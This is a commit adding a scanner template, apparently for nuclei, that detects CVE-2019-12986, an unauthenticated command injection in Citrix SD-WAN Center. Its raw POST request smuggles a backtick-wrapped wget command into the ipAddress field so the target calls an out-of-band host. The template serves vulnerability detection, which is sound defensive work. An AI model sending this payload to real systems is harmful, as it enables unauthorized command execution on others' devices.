Create CVE-2019-12986.yaml

The trace_route action in DiagnosticsController is susceptible to command injection by a remote, unauthenticated attacker. Specifically, the trace_route function does not sufficiently validate or sanitize HTTP request parameter values that are used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted value for ipAddress.

Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com>

cves/2019/CVE-2019-12986.yaml

@@ -0,0 +1,32 @@
+id: CVE-2019-12986
+
+info:
+  name: Citrix SD-WAN Center - Unauthenticated Remote Command Injection
+  author: gy741
+  severity: critical
+  description: |
+    The trace_route action in DiagnosticsController is susceptible to command injection by a remote, unauthenticated attacker. Specifically, the trace_route function does not sufficiently validate or sanitize HTTP request parameter values that are used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted value for ipAddress.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-12986
+    - https://www.tenable.com/security/research/tra-2019-31
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2019-12986
+    cwe-id: CWE-78
+  tags: cve,cve2019,citrix,rce,unauth
+
+requests:
+  - raw:
+      - |
+        POST /Collector/diagnostics/trace_route HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        ipAddress=%60/bin/wget+http://{{interactsh-url}}%60
+
+    matchers:
+      - type: word
+        part: interactsh_protocol  # Confirms the HTTP Interaction
+        words:
+          - "http"